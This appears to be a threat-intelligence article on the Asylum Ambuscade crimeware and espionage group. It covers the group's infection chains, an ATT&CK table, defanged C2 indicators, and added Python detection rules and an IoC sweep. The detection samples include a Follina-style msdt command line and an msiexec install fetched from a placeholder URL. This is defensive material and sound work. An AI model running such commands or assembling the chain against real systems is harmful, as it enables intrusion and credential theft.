The rise of Asylum Ambuscade: from phishing campaigns to global cybercrime wave
The threat actor known as Asylum Ambuscade has straddled cybercrime and cyber espionage since at least early 2020. In a recent analysis, ESET characterizes it as a crimeware group that targets bank customers and cryptocurrency traders in several regions, North America and Europe among them, while also conducting espionage against government entities in Europe and Central Asia.
Asylum Ambuscade first came to light in March 2022, when Proofpoint documented a phishing campaign, which it assessed as nation-state-sponsored, against European government entities seeking intelligence on refugee and supply movements. The attackers' primary objective was to extract confidential information and webmail credentials from official government email portals.
Asylum Ambuscade's espionage attacks typically start with a spear-phishing email carrying a malicious Excel spreadsheet. Once opened, the attachment either runs embedded VBA macro code or exploits the Follina vulnerability (CVE-2022-30190, in the Microsoft Support Diagnostic Tool) to download an MSI package from a remote server.
The MSI installer deploys SunSeed, a downloader written in Lua, which in turn retrieves AHK Bot, an AutoHotkey-based implant, from a second server. Staging delivery this way keeps the final payload off the victim until the first stage has checked in, and lets the operators swap later stages without changing the lure.
Since January 2022, the group's cybercrime activity has hit more than 4,500 victims worldwide, located in North America, Asia, Africa, Europe, and South America. Targets are individuals, cryptocurrency traders, and small to medium-sized businesses (SMBs) across a range of sectors.
ESET researcher Matthieu Faou believes that while one aspect of the attacks is focused on stealing cryptocurrency, the targeting of SMBs is likely aimed at monetizing the access by selling it to other cybercriminal groups.
The crimeware compromise chain follows a similar pattern. The initial vector is a rogue Google Ad or a traffic direction system (TDS) that redirects the victim to a malicious website serving a JavaScript file, which in turn fetches the malware. Asylum Ambuscade also uses NODEBOT, a Node.js port of AHK Bot; it downloads plugins that capture screenshots, harvest passwords, gather system information, and install additional trojans and stealers.
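Both chains described above (Excel attachment to MSI to SunSeed to AHK Bot on the espionage side, TDS to a downloaded .js file to NODEBOT on the crimeware side) reduce to a handful of parent/child and command-line relationships that endpoint telemetry already exposes. The Python below is an added example, not code from ESET, Proofpoint or the actor: it runs simple process-tree rules over constructed Sysmon-style process-creation events. The interpreter file names (lua.exe, AutoHotkey.exe), the user name, staging paths and the package URL are assumptions for the demo; the Startup-folder LNK that relaunches SunSeed at logon produces an interpreter launched by explorer.exe from a user-writable path, which the fourth rule catches whatever the parent is.

```python
"""Process-tree detections for the Asylum Ambuscade delivery chains.

Added example (not ESET's or the actor's code).  Fields mirror Sysmon Event
ID 1 / EDR process-creation records; the sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe"}
# Assumption: interpreter file names as dropped by the MSI; adjust to what you observe.
SCRIPT_INTERPRETERS = {"lua.exe", "lua54.exe", "autohotkey.exe"}
JS_HOSTS = {"wscript.exe", "cscript.exe", "node.exe"}
USER_WRITABLE = re.compile(r"\\(?:users|programdata|temp)\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
DOWNLOADED_JS = re.compile(r"\\downloads\\[^\"\s]+\.js\b", re.I)


def base_name(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawns_msdt(e: ProcEvent) -> bool:
    # Follina (CVE-2022-30190): the ms-msdt: handler runs msdt.exe under the Office process.
    return base_name(e.parent_image) in OFFICE_APPS and base_name(e.image) == "msdt.exe"


def office_spawns_msiexec(e: ProcEvent) -> bool:
    # VBA macro or Follina payload handing off to msiexec to fetch the MSI stage.
    return base_name(e.parent_image) in OFFICE_APPS and base_name(e.image) == "msiexec.exe"


def msiexec_remote_package(e: ProcEvent) -> bool:
    # msiexec asked to install a package straight from a URL, whatever the parent.
    return base_name(e.image) == "msiexec.exe" and REMOTE_URL.search(e.command_line) is not None


def interpreter_script_in_user_path(e: ProcEvent) -> bool:
    # Lua/AutoHotkey interpreter running a script from a user-writable path; the
    # Startup-folder LNK relaunching SunSeed at logon looks like this (parent explorer.exe).
    return base_name(e.image) in SCRIPT_INTERPRETERS and USER_WRITABLE.search(e.command_line) is not None


def script_host_runs_downloaded_js(e: ProcEvent) -> bool:
    # Crimeware chain: a .js file from the Downloads folder executed by a script host.
    return base_name(e.image) in JS_HOSTS and DOWNLOADED_JS.search(e.command_line) is not None


RULES = [office_spawns_msdt, office_spawns_msiexec, msiexec_remote_package,
         interpreter_script_in_user_path, script_host_runs_downloaded_js]


def evaluate(events):
    """Return [(event_index, rule_name), ...] for every rule each event trips."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
# Constructed events; user name, staging paths and the package URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(OFFICE16 + r"\EXCEL.EXE", r"C:\Windows\System32\msdt.exe",
              r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=placeholder"'),
    ProcEvent(OFFICE16 + r"\EXCEL.EXE", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i http://package.example.invalid/update.msi /qn"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\alice\AppData\Local\Temp\stage\lua.exe",
              r'"C:\Users\alice\AppData\Local\Temp\stage\lua.exe" "C:\Users\alice\AppData\Local\Temp\stage\main.lua"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice_2023.js"'),
    # Benign: Excel started from Explorer, and the Windows Installer service itself.
    ProcEvent(r"C:\Windows\explorer.exe", OFFICE16 + r"\EXCEL.EXE", r'"EXCEL.EXE"'),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The rules deliberately match on the relationship rather than on file hashes, so they survive a recompiled SunSeed or a renamed .js lure; the price is that a legitimate msiexec install from a URL or an in-house AutoHotkey script under C:\Users will also fire, so tune the allowlists before alerting on them.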
The similarities observed in the attack chains employed by Asylum Ambuscade in both cybercrime and espionage activities suggest that the group is primarily a cybercrime organization with some involvement in cyber espionage.
Proofpoint tracks an overlapping activity cluster, Screentime, under the name TA866; it targets companies in the U.S. and Germany with tailored malware to steal sensitive information. These overlaps further underline the breadth of the group's operations.
“It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,” Faou said. Asylum Ambuscade’s dual-threat activities make it a notable rarity in the ever-evolving threat landscape.
MITRE ATT&CK techniques
Tactic | ID | Name | Description |
---|---|---|---|
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server | Asylum Ambuscade rented VPS servers. |
Resource Development | T1587.001 | Develop Capabilities: Malware | Asylum Ambuscade develops custom implants in various scripting languages. |
Initial Access | T1189 | Drive-by Compromise | Targets were redirected via a TDS to a website delivering a malicious JavaScript file. |
Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Targets receive malicious Excel or Word documents. |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | Asylum Ambuscade has a downloader in VBS. |
Execution | T1059.006 | Command and Scripting Interpreter: Python | Asylum Ambuscade has a screenshotter in Python. |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript | Asylum Ambuscade has a downloader in JavaScript (NODEBOT). |
Execution | T1059 | Command and Scripting Interpreter | Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl. |
Execution | T1204.002 | User Execution: Malicious File | Targets need to manually execute the malicious document or JavaScript file. |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | SunSeed persists via a LNK file in the Startup folder. |
Defense Evasion | T1027.010 | Obfuscated Files or Information: Command Obfuscation | Downloaded JavaScript files are obfuscated with junk code. |
Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | The AHKBOT passwords plugin can steal browser credentials. |
Discovery | T1087.002 | Account Discovery: Domain Account | The AHKBOT domain plugin gathers information about the domain using net group. |
Discovery | T1010 | Application Window Discovery | The AHKBOT wndlist plugin lists the active windows. |
Discovery | T1482 | Domain Trust Discovery | The AHKBOT domain plugin gathers information using nltest. |
Discovery | T1057 | Process Discovery | The AHKBOT tasklist plugin lists the active processes using Select * from Win32_Process. |
Discovery | T1518.001 | Software Discovery: Security Software Discovery | The AHKBOT hardware plugin lists security software using Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct. |
Discovery | T1082 | System Information Discovery | The AHKBOT wndlist plugin gets system information using systeminfo. |
Discovery | T1016 | System Network Configuration Discovery | The AHKBOT wndlist plugin gets network configuration information using ipconfig /all. |
Collection | T1056.001 | Input Capture: Keylogging | The AHKBOT keylogon plugin records keystrokes. |
Collection | T1115 | Clipboard Data | The AHKBOT keylogon plugin monitors the clipboard. |
Collection | T1113 | Screen Capture | The AHKBOT deskscreen plugin takes screenshots. |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP. |
Exfiltration | T1041 | Exfiltration Over C2 Channel | Data is exfiltrated via the C&C channel. |
Indicators of Compromise
Indicator (SHA-1 hashes of samples, followed by IP addresses defanged with [.]) |
---|
2B42FD41A1C8AC12221857DD2DF93164A71B95D7 |
D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8 |
57157C5D3C1BB3EB3E86B24B1F4240C867A5E94F |
7DB446B95D5198330B2B25E4BA6429C57942CFC9 |
5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8E |
C98061592DE61E34DA280AB179465580947890DE |
519E388182DE055902C656B2D95CCF265A96CEAB |
AC3AFD14AD1AEA9E77A84C84022B4022DF1FC88B |
64F5AC9F0C6C12F2A48A1CB941847B0662734FBF |
557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADF |
F85B82805C6204F34DB0858E2F04DA9F620A0277 |
5492061DE582E71B2A5DA046536D4150F6F497F1 |
C554100C15ED3617EBFAAB00C983CED5FEC5DB11 |
AD8143DE4FC609608D8925478FD8EA3CD9A37C5D |
F2948C27F044FC6FB4849332657801F78C0F7D5E |
7AA23E871E796F89C465537E6ECE962412CDA636 |
384961E19624437EB4EB22B1BF45953D7147FB8F |
7FDB9A73B3F13DBD94D392132D896A5328DACA59 |
3E38D54CC55A48A3377A7E6A0800B09F2E281978 |
7F8742778FC848A6FBCFFEC9011B477402544171 |
29604997030752919EA42B6D6CEE8D3AE28F527E |
7A78AF75841C2A8D8A5929C214F08EB92739E9CB |
441369397D0F8DB755282739A05CB4CF52113C40 |
117ECFA95BE19D5CF135A27AED786C98EC8CE50B |
D24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3 |
95EDC096000C5B8DA7C8F93867F736928EA32575 |
62FA77DAEF21772D599F2DC17DBBA0906B51F2D9 |
A9E3ACFE029E3A80372C0BB6B7C500531D09EDBE |
EE1CFEDD75CBA9028904C759740725E855AA46B5 |
5.39.222[.]150 |
5.44.42[.]27 |
5.230.68[.]137 |
5.230.71[.]166 |
5.230.72[.]38 |
5.230.72[.]148 |
5.230.73[.]57 |
5.230.73[.]63 |
5.230.73[.]241 |
5.230.73[.]247 |
5.230.73[.]248 |
5.230.73[.]250 |
5.252.118[.]132 |
5.252.118[.]204 |
5.255.88[.]222 |
23.106.123[.]119 |
31.192.105[.]28 |
45.76.211[.]131 |
45.77.185[.]151 |
45.132.1[.]238 |
45.147.229[.]20 |
46.17.98[.]190 |
46.151.24[.]197 |
46.151.24[.]226 |
46.151.25[.]15 |
46.151.25[.]49 |
46.151.28[.]18 |
51.83.182[.]153 |
51.83.189[.]185 |
62.84.99[.]195 |
62.204.41[.]171 |
77.83.197[.]138 |
79.137.196[.]121 |
79.137.197[.]187 |
80.66.88[.]155 |
84.32.188[.]29 |
84.32.188[.]96 |
85.192.49[.]106 |
85.192.63[.]13 |
85.192.63[.]126 |
85.239.60[.]40 |
88.210.10[.]62 |
89.41.182[.]94 |
89.107.10[.]7 |
89.208.105[.]255 |
91.245.253[.]112 |
94.103.83[.]46 |
94.140.114[.]133 |
94.140.114[.]230 |
94.140.115[.]44 |
94.232.41[.]96 |
94.232.41[.]108 |
94.232.43[.]214 |
98.142.251[.]26 |
98.142.251[.]226 |
104.234.118[.]163 |
104.248.149[.]122 |
109.107.173[.]72 |
116.203.252[.]67 |
128.199.82[.]141 |
139.162.116[.]148 |
141.105.64[.]121 |
146.0.77[.]15 |
146.70.79[.]117 |
157.254.194[.]225 |
157.254.194[.]238 |
172.64.80[.]1 |
172.86.75[.]49 |
172.104.94[.]104 |
172.105.235[.]94 |
172.105.253[.]139 |
176.124.214[.]229 |
176.124.217[.]20 |
185.70.184[.]44 |
185.82.126[.]133 |
185.123.53[.]49 |
185.150.117[.]122 |
185.163.45[.]221 |
193.109.69[.]52 |
193.142.59[.]152 |
193.142.59[.]169 |
194.180.174[.]51 |
195.2.81[.]70 |
195.133.196[.]230 |
212.113.106[.]27 |
212.113.116[.]147 |
212.118.43[.]231 |
213.109.192[.]230 |
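Indicator lists in this form are only useful once they are normalized (defanging removed, hashes lower-cased) and swept against real data. The Python below is an added example, not part of the ESET report: it parses rows pasted straight from the table above (trailing "|" included), then checks a few constructed Squid-style proxy log lines and a constructed path-to-SHA-1 inventory against them. The log lines, client addresses, file paths and the non-indicator hash are made up for the demo. It also flags one caveat a practitioner would want: some listed addresses, such as 172.64.80[.]1, sit in shared CDN space (Cloudflare's 172.64.0.0/13), so a hit there is a lead to pivot on rather than a verdict.

```python
"""Sweep proxy logs and a file-hash inventory for the indicators listed above.

Added example, not part of the ESET report.  The IoC excerpt is copied from
the table (defanged, trailing "|" kept to show rows can be pasted as-is);
the proxy log lines and file inventory are constructed for the demo.
"""
import ipaddress
import re

IOC_TEXT = """
2B42FD41A1C8AC12221857DD2DF93164A71B95D7 |
5.39.222[.]150 |
45.76.211[.]131 |
172.64.80[.]1 |
"""

SHA1_RE = re.compile(r"^[0-9a-f]{40}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
IPV4_IN_TEXT = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Shared CDN/hosting space: an IP hit here is a lead to pivot on, not a verdict.
SHARED_INFRA = [ipaddress.ip_network("172.64.0.0/13")]   # Cloudflare


def refang(token: str) -> str:
    """Undo the usual defanging so indicators compare against raw log data."""
    return token.replace("[.]", ".").replace("hxxp", "http")


def parse_iocs(text: str):
    """Split a pasted indicator list into (sha1_set, ip_set); everything lower-cased."""
    hashes, ips = set(), set()
    for raw in text.splitlines():
        token = refang(raw.strip().rstrip("|").strip()).lower()
        if SHA1_RE.match(token):
            hashes.add(token)
        elif IPV4_RE.match(token):
            ips.add(token)
    return hashes, ips


def confidence(ip: str) -> str:
    """'low' when the address lives in shared infrastructure, else 'high'."""
    addr = ipaddress.ip_address(ip)
    return "low" if any(addr in net for net in SHARED_INFRA) else "high"


def sweep_proxy(lines, ips):
    """Return [(line_index, ip, confidence), ...] for lines touching an IoC address."""
    hits = []
    for idx, line in enumerate(lines):
        for ip in sorted(set(IPV4_IN_TEXT.findall(line))):
            if ip in ips:
                hits.append((idx, ip, confidence(ip)))
    return hits


def sweep_hashes(inventory, hashes):
    """Return [(path, sha1), ...] for inventory entries whose SHA-1 is an IoC."""
    return [(path, h.lower()) for path, h in inventory.items() if h.lower() in hashes]


# Constructed Squid-style access log lines (placeholder hosts and clients).
LOG_LINES = [
    "1686218462.101 10.0.0.12 TCP_MISS/200 GET http://5.39.222.150/index.php - HIER_DIRECT/5.39.222.150",
    "1686218601.455 10.0.0.15 TCP_MISS/200 GET https://www.example.com/ - HIER_DIRECT/93.184.216.34",
    "1686218710.902 10.0.0.20 TCP_MISS/200 GET https://cdn.example.net/app.js - HIER_DIRECT/172.64.80.1",
]

# Constructed inventory: path -> SHA-1 (second entry is SHA-1 of the empty string, not an IoC).
FILE_HASHES = {
    r"C:\Users\alice\Downloads\invoice.js": "2b42fd41a1c8ac12221857dd2df93164a71b95d7",
    r"C:\Windows\System32\notepad.exe": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
}

if __name__ == "__main__":
    hashes, ips = parse_iocs(IOC_TEXT)
    for hit in sweep_proxy(LOG_LINES, ips):
        print("proxy:", hit)
    for hit in sweep_hashes(FILE_HASHES, hashes):
        print("file:", hit)
```

Replace IOC_TEXT with the full table when running this for real, and extend SHARED_INFRA with any other CDN or bulk-hosting ranges you see in the list before trusting an IP-only hit.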